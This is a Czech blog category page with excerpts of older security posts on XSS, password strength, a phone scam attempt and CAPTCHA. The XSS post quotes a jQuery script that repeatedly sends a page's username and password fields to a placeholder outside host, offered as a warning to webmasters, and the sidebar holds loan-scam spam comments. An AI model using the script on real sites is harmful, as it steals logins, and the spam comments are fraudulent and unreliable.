Bezpečnost a hacking | Michal Smrčka - blog

Aukro v nové soutěži odměnuje šikovné programátory

V těchto dnech probíhá na Aukro.cz soutěž „Aukro naděluje“. Každý den organizátoři umístí do nějaké náhodné sekce na Aukru relativně hodnotné produkty za směšně nízkou cenu. Je k dispozici vždy pouze 1 kus. Vy musíte tento produkt najít a zakoupit jako první.

O soutěži jsem se dozvěděl na Twitteru a nebýt následujícího odvážného prohlášení Aukra, ani bych se jí příliš nezaobíral:

foto

foto

„Nebojte, na roboty a podvodné programy jsme mysleli, takže tudy cesta nevede.“


18. 11. 2011 v 16:04 • Bezpečnost a hacking • autor Michal Smrčka86 komentářů

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Na délce záleží! Jak zvolit správné heslo?

Průměrný uživatel používá k přihlášení na webové služby velmi slabá hesla. Tak slabá, že případný útočník dokáže za několik hodin, příp. dní heslo v plné své kráse odhalit. Lidé toto zbytečně podceňují, navíc zvolit si těžko prolomitelné heslo nemusí být vůbec složité!

Nejdříve pár čísel.

V souvislosti se statistikami hesel pocházejícími ze vzorku více než 800.000 uživatelských účtů vyplynuly tyto závěry: *

  • 9% uživatelů má heslo dlouhé jen 4 znaky nebo méně
  • ovšem heslo o maximální délce 6 znaků (pořád slabé) používá více než 50% lidí!
  • počet hesel, který dokáže počítač automaticky tipnout za jednu sekundu, se pohybuje mezi 20 a 100 za sekundu **
  • zjištění čtyřmístného hesla tedy brutal-force útokem zpravidla trval maximálně 40 hodin, v praxi je to ale mnohem méně
  • odhalení pětimístného hesla by bylo jisté maximálně za 24 dní, ovšem za předpokladu zapojení více paralelních počítačů je možné proces urychlit
  • pokud máte maximálně šestimístné heslo, prodloužila by se maximální doba zjištění na téměř 2,5 roku, nicméně také platí, že v případě zapojení více počítačů se doba zkrátí :)

20. 09. 2009 v 21:29 • Bezpečnost a hacking • autor Michal Smrčka10 komentářů

Řekněte mi, prosím, Vaše heslo...

Příchozí hovor z klasického telefonního čísla s předvolbou 776:

„Dobrý den, mluvím s panem Michalem Smrčkou?“
„Ano, u telefonu.“
„Vidím, že využíváte služby našeho operátora a měl bych pro Vás výhodnou nabídku. Nicméně potřeboval bych si Vás ověřit. Můžete mi, prosím, pro kontrolu sdělit Vaše osobní heslo?“

Jak byste zareagovali v mém případě?


21. 06. 2009 v 19:15 • Bezpečnost a hacking • autor Michal Smrčka3 komentáře

Zlo jménem Captcha (opisování znaků z obrázku)

Jsem zásadní odpůrce Captchy. Je to velmi účinná metoda, jak uživatele co nejvíce nasrat.

Captcha je řetězec znaků, který na některých webech musíte opsat z obrázku, abyste mohli přispět diskuzním příspěvkem, poslat e-mail prodejci atp. Důvodem má být zamezení automatického odesílání SPAMu skrz tyto formuláře nebo jiné strojové využití formulářů (roboti vygenerované znaky obvykle neumí rozpoznat a „opsat“).

  captcha

19. 04. 2009 v 11:11 • Bezpečnost a hacking • autor Michal Smrčka78 komentářů

Stránka: 1 2 >

Kategorie blogu

Twitter feed

Poslední články

Poslední komentáře

Stanislav Kovac: Stále potřebujete finanční pomoc a nevíte, kde ji získáte, kontaktujte pana Peter Krajčovič na senatorrpwalter@hotmail.com, http://spkinvestment.com/ za úvěr, protože od něj obdržel podnikatelský úvěr ve výši 1.000.000 €. Je zaručeno. Ukázat
mike peterson: Potřebujete půjčku? nabízíme všechny druhy půjček, jako jsou osobní půjčky, dluhové konsolidační úvěry, rizikový kapitál, podnikatelský úvěr, vzdělávací půjčka, domácí úvěr a úvěr z jakéhokoli důvodu a naléhavých potřeb !. s úrokovou sazbou 2% Byla jste odmítnuta vaší bankou? Máte špatný kredit? Máte... Ukázat
Kesby Karen: Jsem paní Kesbyová Karenová a to mi dává radost, když píšu tento článek svého svědectví o tom, jak jsem se dosud stal finančně stabilním a souhrnem své předchozí finanční fáze. Domnívám se, že není nikdo, kdo nemá rád peníze, když člověk má finanční... Ukázat
Joyce Franklin: Ahoj všichni Jsem paní Lisa Monica z Limy, Peru. Rád bych se podělil o Boží dobrota v mém životě po tolika měsících, kdy jsem se snažil dostat půjčku na internet a byl jsem scammed, takže jsem se stal neklidným a zoufalým při získávání... Ukázat
Joyce Franklin: Ahoj všichni Jsem paní Lisa Monica z Limy, Peru. Rád bych se podělil o Boží dobrota v mém životě po tolika měsících, kdy jsem se snažil dostat půjčku na internet a byl jsem scammed, takže jsem se stal neklidným a zoufalým při získávání... Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc